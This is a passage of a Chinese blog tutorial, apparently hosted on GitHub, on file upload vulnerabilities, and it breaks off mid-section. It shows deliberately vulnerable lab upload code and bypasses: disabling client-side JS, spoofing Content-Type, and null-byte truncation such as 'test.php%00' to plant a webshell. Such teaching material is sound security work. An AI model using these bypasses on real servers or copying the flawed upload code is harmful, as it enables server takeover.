-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path0053789dab3b.html
459 lines (374 loc) · 179 KB
/
0053789dab3b.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>文件上传漏洞 | BaiKer</title><meta name="keywords" content="文件上传漏洞"><meta name="author" content="BaiKer"><meta name="copyright" content="BaiKer"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="文件上传漏洞 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。常见场景是web服务器允许用户上传图片或者普通文本文件保存,而用户绕过上传机制上传恶意代码并执行从而控制服务器。显然这种漏洞是getshell最快最直接的方法之一,需要说明的是上传文件操作本身是没有问题的,问题在于文件上传到服务器后,服务器怎么处理和解释文件 文件上传漏洞条件 上传的文">
<meta property="og:type" content="article">
<meta property="og:title" content="文件上传漏洞">
<meta property="og:url" content="http://baiker.top/0053789dab3b.html">
<meta property="og:site_name" content="BaiKer">
<meta property="og:description" content="文件上传漏洞 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。常见场景是web服务器允许用户上传图片或者普通文本文件保存,而用户绕过上传机制上传恶意代码并执行从而控制服务器。显然这种漏洞是getshell最快最直接的方法之一,需要说明的是上传文件操作本身是没有问题的,问题在于文件上传到服务器后,服务器怎么处理和解释文件 文件上传漏洞条件 上传的文">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://inews.gtimg.com/newsapp_ls/0/13902964058/0">
<meta property="article:published_time" content="2021-04-19T09:05:47.000Z">
<meta property="article:modified_time" content="2022-10-06T13:13:21.098Z">
<meta property="article:author" content="BaiKer">
<meta property="article:tag" content="文件上传漏洞">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://inews.gtimg.com/newsapp_ls/0/13902964058/0"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://baiker.top/0053789dab3b"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = {
root: '/',
algolia: undefined,
localSearch: undefined,
translate: undefined,
noticeOutdate: undefined,
highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
copy: {
success: '复制成功',
error: '复制错误',
noSupport: '浏览器不支持'
},
relativeDate: {
homepage: false,
post: false
},
runtime: '天',
date_suffix: {
just: '刚刚',
min: '分钟前',
hour: '小时前',
day: '天前',
month: '个月前'
},
copyright: undefined,
lightbox: 'fancybox',
Snackbar: undefined,
source: {
justifiedGallery: {
js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.js',
css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.css'
}
},
isPhotoFigcaption: false,
islazyload: false,
isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
title: '文件上传漏洞',
isPost: true,
isHome: false,
isHighlightShrink: false,
isToc: true,
postUpdate: '2022-10-06 21:13:21'
}</script><noscript><style type="text/css">
#nav {
opacity: 1
}
.justified-gallery img {
opacity: 1
}
#recent-posts time,
#post-meta time {
display: inline !important
}
</style></noscript><script>(win=>{
win.saveToLocal = {
set: function setWithExpiry(key, value, ttl) {
if (ttl === 0) return
const now = new Date()
const expiryDay = ttl * 86400000
const item = {
value: value,
expiry: now.getTime() + expiryDay,
}
localStorage.setItem(key, JSON.stringify(item))
},
get: function getWithExpiry(key) {
const itemStr = localStorage.getItem(key)
if (!itemStr) {
return undefined
}
const item = JSON.parse(itemStr)
const now = new Date()
if (now.getTime() > item.expiry) {
localStorage.removeItem(key)
return undefined
}
return item.value
}
}
win.getScript = url => new Promise((resolve, reject) => {
const script = document.createElement('script')
script.src = url
script.async = true
script.onerror = reject
script.onload = script.onreadystatechange = function() {
const loadState = this.readyState
if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
script.onload = script.onreadystatechange = null
resolve()
}
document.head.appendChild(script)
})
win.activateDarkMode = function () {
document.documentElement.setAttribute('data-theme', 'dark')
if (document.querySelector('meta[name="theme-color"]') !== null) {
document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
}
}
win.activateLightMode = function () {
document.documentElement.setAttribute('data-theme', 'light')
if (document.querySelector('meta[name="theme-color"]') !== null) {
document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
}
}
const t = saveToLocal.get('theme')
if (t === 'dark') activateDarkMode()
else if (t === 'light') activateLightMode()
const asideStatus = saveToLocal.get('aside-status')
if (asideStatus !== undefined) {
if (asideStatus === 'hide') {
document.documentElement.classList.add('hide-aside')
} else {
document.documentElement.classList.remove('hide-aside')
}
}
const detectApple = () => {
if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
document.documentElement.classList.add('apple')
}
}
detectApple()
})(window)</script><meta name="referrer" content="no-referrer" /><link rel="stylesheet" href="https://baiker.top/css/essay.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Zfour/Butterfly-double-row-display@1.00/cardlistpost.css"/><meta name="generator" content="Hexo 5.4.0"></head><body><div id="web_bg"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data is-center"><div class="data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">40</div></a></div><div class="data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">22</div></a></div><div class="data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">45</div></a></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/essay"><span> 随笔</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/Gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://inews.gtimg.com/newsapp_ls/0/13902964058/0')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">BaiKer</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/essay"><span> 随笔</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/Gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">文件上传漏洞</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2021-04-19T09:05:47.000Z" title="发表于 2021-04-19 17:05:47">2021-04-19</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-10-06T13:13:21.098Z" title="更新于 2022-10-06 21:13:21">2022-10-06</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">漏洞利用</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E5%B8%B8%E8%A7%84%E6%BC%8F%E6%B4%9E/">常规漏洞</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E5%B8%B8%E8%A7%84%E6%BC%8F%E6%B4%9E/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/">文件上传漏洞</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">8.4k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>37分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="文件上传漏洞"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><meta name="referrer" content="no-referrer" />
<h1 id="文件上传漏洞"><a href="#文件上传漏洞" class="headerlink" title="文件上传漏洞"></a>文件上传漏洞</h1><p> 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。常见场景是web服务器允许用户上传图片或者普通文本文件保存,而用户绕过上传机制上传恶意代码并执行从而控制服务器。显然这种漏洞是getshell最快最直接的方法之一,需要说明的是上传文件操作本身是没有问题的,问题在于文件上传到服务器后,服务器怎么处理和解释文件</p>
<h2 id="文件上传漏洞条件"><a href="#文件上传漏洞条件" class="headerlink" title="文件上传漏洞条件"></a>文件上传漏洞条件</h2><ul>
<li>上传的文件可以被web服务器当作脚本来执行</li>
<li>我们可以访问上传文件的路径</li>
</ul>
<h2 id="服务器上传文件命名规则"><a href="#服务器上传文件命名规则" class="headerlink" title="服务器上传文件命名规则"></a>服务器上传文件命名规则</h2><ul>
<li>第一种:上传文件名和服务器命名一致</li>
<li>第二种:上传文件名和服务器命名不一致(随机,时间日期命名等),但是后缀一致</li>
<li>第三种:上传文件名和服务器命名不一致(随机,时间日期命名等),后缀不一致</li>
</ul>
<h2 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h2><p> 由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致用户可以越过其本身权限向服务器上传可执行的动态脚本文件。打个比方来说,如果你使用 php 作为服务器端的脚本语言,那么在你网站的上传功能处,就一定不能让用户上传 php 类型的文件,否则他上传一个木马文件,你服务器就被他控制了。因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。</p>
<p>一般我们会利用文件上传漏洞上传一句话木马,然后用工具连接获取 webshell。</p>
<p>但是这里有两个问题:</p>
<ul>
<li>第一你的文件能上传到web服务器,并且知道上传的路径</li>
<li>第二你的文件能被当成脚本文件执行,所以要想让上传文件被当成脚本执行,我们经常会和文件包含漏洞和文件解析漏洞一起利用</li>
</ul>
<h1 id="文件上传检测方式"><a href="#文件上传检测方式" class="headerlink" title="文件上传检测方式"></a>文件上传检测方式</h1><h2 id="客户端"><a href="#客户端" class="headerlink" title="客户端"></a>客户端</h2><h3 id="JS前端脚本检查"><a href="#JS前端脚本检查" class="headerlink" title="JS前端脚本检查"></a>JS前端脚本检查</h3><p> 前端检测文件扩展名。当客户端选择文件点击上传的时候,客户端还没有向服务器发送任何消息,前端的 js 脚本就对文件的扩展名进行检测来判断是否是可以上传的类型</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">checkFile</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> file = <span class="built_in">document</span>.getElementsByName(<span class="string">'upload_file'</span>)[<span class="number">0</span>].value;</span><br><span class="line"> <span class="keyword">if</span> (file == <span class="literal">null</span> || file == <span class="string">""</span>) {</span><br><span class="line"> alert(<span class="string">"请选择要上传的文件!"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">//定义允许上传的文件类型</span></span><br><span class="line"> <span class="keyword">var</span> allow_ext = <span class="string">".jpg|.png|.gif"</span>;</span><br><span class="line"> <span class="comment">//提取上传文件的类型</span></span><br><span class="line"> <span class="keyword">var</span> ext_name = file.substring(file.lastIndexOf(<span class="string">"."</span>));</span><br><span class="line"> <span class="comment">//判断上传文件类型是否允许上传</span></span><br><span class="line"> <span class="keyword">if</span> (allow_ext.indexOf(ext_name + <span class="string">"|"</span>) == -<span class="number">1</span>) {</span><br><span class="line"> <span class="keyword">var</span> errMsg = <span class="string">"该文件不允许上传,请上传"</span> + allow_ext + <span class="string">"类型的文件,当前文件类型为:"</span> + ext_name;</span><br><span class="line"> alert(errMsg);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<ol>
<li>直接禁用JavaScript实现绕过</li>
</ol>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gptrxttva6j30mn01rq2t.jpg"></p>
<ol start="2">
<li>先把文件扩展名改成允许上传的文件类型,再利用burp suite抓包改成自己想要的文件类型,即可绕过</li>
</ol>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gptrxtwi0xj30le04xjsh.jpg"></p>
<p>找到上传地址</p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gptrxtxuonj30g3038jrp.jpg"></p>
<p>用工具链接即可</p>
<h2 id="服务端"><a href="#服务端" class="headerlink" title="服务端"></a>服务端</h2><h3 id="检查后缀"><a href="#检查后缀" class="headerlink" title="检查后缀"></a>检查后缀</h3><h4 id="白名单"><a href="#白名单" class="headerlink" title="白名单"></a>白名单</h4><h5 id="MIME绕过"><a href="#MIME绕过" class="headerlink" title="MIME绕过"></a>MIME绕过</h5><p>MIME (Multipurpose Internet Mail Extensions) 是描述消息内容类型的因特网标准</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="keyword">if</span> ((<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/jpeg'</span>) || (<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/png'</span>) || (<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/gif'</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">'/'</span> . <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>] </span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'文件类型不正确,请重新上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH.<span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>主要在服务端对数据包的MIME进行检查,修改content-type:image/jpeg即可</p>
<div class="tabs" id=""><ul class="nav-tabs"><li class="tab active"><button type="button" data-href="#-1">修改之前</button></li><li class="tab"><button type="button" data-href="#-2">修改之后</button></li></ul><div class="tab-contents"><div class="tab-item-content active" id="-1"><p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gptrxtwe87j30i7049gmh.jpg"></p><button type="button" class="tab-to-top" aria-label="scroll to top"><i class="fas fa-arrow-up"></i></button></div><div class="tab-item-content" id="-2"><p>把 Content-Type: application/octet-stream</p>
<p>改成 Content-Type: image/jpeg</p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gptrxtp5g1j30jw048gmh.jpg"></p><button type="button" class="tab-to-top" aria-label="scroll to top"><i class="fas fa-arrow-up"></i></button></div></div></div>
<h5 id="00截断"><a href="#00截断" class="headerlink" title="%00截断"></a>%00截断</h5><p>无论是%00还是0x00,最终被解析之后都表示ascll码中的0,而ascll码中的0作为特殊字符保留,代表NULL,表示空字符,当一个字符串中存在空字符的时候,在被解析的时候就会导致空字符后面的字符被丢弃</p>
<p>%00代表着url的转换,通常用于get传参的00截断</p>
<p>php版本<5.3.4的时候会出现这个情况</p>
<p>且要关闭参数<code>magic_quotes_gpc</code>,设置为OFF</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$ext_arr</span> = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = substr(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],strrpos(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span>(in_array(<span class="variable">$file_ext</span>,<span class="variable">$ext_arr</span>)){</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = <span class="variable">$_GET</span>[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_ext</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)){</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>在这里发现文件上传的路径是可控的</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$img_path</span> = <span class="variable">$_GET</span>[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_ext</span>;</span><br></pre></td></tr></table></figure>
<p>保存文件时是将get得到的路径与随机数年月日和上传文件名拼接到一起,所以上传文件路径可控,我们将get的路径最后改为<code>test.php0x00</code>那么拼接到后面的内容就会被丢弃。</p>
<div class="tabs" id=""><ul class="nav-tabs"><li class="tab active"><button type="button" data-href="#-1">修改之前</button></li><li class="tab"><button type="button" data-href="#-2">修改之后</button></li></ul><div class="tab-contents"><div class="tab-item-content active" id="-1"><p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gq5r2rekkwj31050hfdkv.jpg" alt="文件上传-00截断1.png"></p><button type="button" class="tab-to-top" aria-label="scroll to top"><i class="fas fa-arrow-up"></i></button></div><div class="tab-item-content" id="-2"><p>在url路径后面写入<code>test.php%00</code></p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gq5r4txbw9j30zq0dcjuj.jpg" alt="文件上传-00截断2.png"></p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gq5rjhb6igj30do0203yn.jpg" alt="文件上传-00截断3.png"></p>
<p>上传之后直接访问<code>/upload/test.php</code>即可</p><button type="button" class="tab-to-top" aria-label="scroll to top"><i class="fas fa-arrow-up"></i></button></div></div></div>
<h5 id="0x00截断"><a href="#0x00截断" class="headerlink" title="0x00截断"></a>0x00截断</h5><p>无论是%00还是0x00,最终被解析之后都表示ascll码中的0,而ascll码中的0作为特殊字符保留,代表NULL,表示空字符,当一个字符串中存在空字符的时候,在被解析的时候就会导致空字符后面的字符被丢弃</p>
<p>0x00通常用于post传参的00截断</p>
<p>php版本<5.3.4的时候会出现这个情况</p>
<p>且要关闭参数<code>magic_quotes_gpc</code>,设置为OFF</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$ext_arr</span> = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = substr(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],strrpos(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span>(in_array(<span class="variable">$file_ext</span>,<span class="variable">$ext_arr</span>)){</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = <span class="variable">$_POST</span>[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_ext</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)){</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传失败"</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>在这里发现文件上传的路径是可控的</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$img_path</span> = <span class="variable">$_POST</span>[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_ext</span>;</span><br></pre></td></tr></table></figure>
<p>这次是使用post进行上传,在这里对二进制进行修改</p>
<div class="tabs" id=""><ul class="nav-tabs"><li class="tab active"><button type="button" data-href="#-1">修改之前</button></li><li class="tab"><button type="button" data-href="#-2">修改之后</button></li></ul><div class="tab-contents"><div class="tab-item-content active" id="-1"><p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gq5ruya6vij31140ikn1b.jpg" alt="文件上传-00截断4.png"></p>
<p>在这里把<code>../upload/</code>改为<code>../upload/test.php</code></p>
<p>十六进制如下</p>
